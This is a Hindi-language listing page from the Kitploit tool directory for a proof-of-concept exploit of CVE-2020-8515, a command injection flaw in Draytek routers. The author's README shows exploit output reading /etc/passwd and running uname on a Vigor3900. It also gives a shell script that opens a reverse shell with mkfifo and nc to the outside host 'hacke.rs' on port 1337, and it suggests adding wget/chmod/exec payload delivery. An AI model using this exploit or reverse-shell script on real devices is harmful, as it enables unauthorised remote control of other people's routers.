Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-8515 — CVE-2020-8515 में Draytek राउटर में कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें स्वचालित शोषण, रिवर्स शेल डिलीवरी, और nuclei स्कैनिंग टेम्पलेट्स के साथ एकीकरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/darrenmartyn/cve-2020-8515
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubdarrenmartyn/cve-2020-8515

CVE-2020-8515

CVE-2020-8515 में Draytek राउटर में कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें स्वचालित शोषण, रिवर्स शेल डिलीवरी, और nuclei स्कैनिंग टेम्पलेट्स के साथ एकीकरण शामिल है।

रिपॉजिटरी देखें
5435 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-8515

मेरे पास पड़ा हुआ Draytek CVE-2020-8515 PoC।

मजेदार बात यह है कि इंजेक्ट किया गया कमांड दो बार निष्पादित होता है, यहाँ देखें:

root@kitploit:~
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown

मेरी कुछ योजनाएँ थीं इसे अच्छी तरह से तैयार करने की, लेकिन ईमानदारी से कहूँ तो, एक साल बाद भी मुझे याद नहीं कि वे योजनाएँ क्या थीं, तो यह लो। इसमें wget/chmod/exec जोड़ना मुश्किल नहीं है, बस "do_stuff" फंक्शन में देखें।

अगर आप wget से डाउनलोड करके निम्नलिखित स्क्रिप्ट चलाते हैं, तो आपको एक रिवर्स शेल मिलता है:

root@kitploit:~
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

मुझे लगता है कि आप शायद ऐसी स्क्रिप्ट को इकोलोड भी कर सकते हैं अगर आप इंजेक्शन में खराब कैरेक्टर से बच सकें, शायद मैं बाद में जोड़ूँ - डबल-एक्सीक्यूशन समस्या इसे थोड़ा कठिन बनाती है। अभी के लिए, यह आधा-अधूरा है, "उपयोगकर्ता तय करे"।

यह एक्सप्लॉइट असली दुनिया में ज्यादा नुकसान नहीं पहुंचाएगा, इसके प्रति संवेदनशील सभी बॉक्स शायद पहले ही स्क्रिप्ट किडीज के DDoS बॉटनेट द्वारा कब्जा कर लिए गए हैं।

स्कैनिंग के लिए: किसी ने बनाया nuclei टेम्पलेट का उपयोग करें।

टूल डाउनलोड करें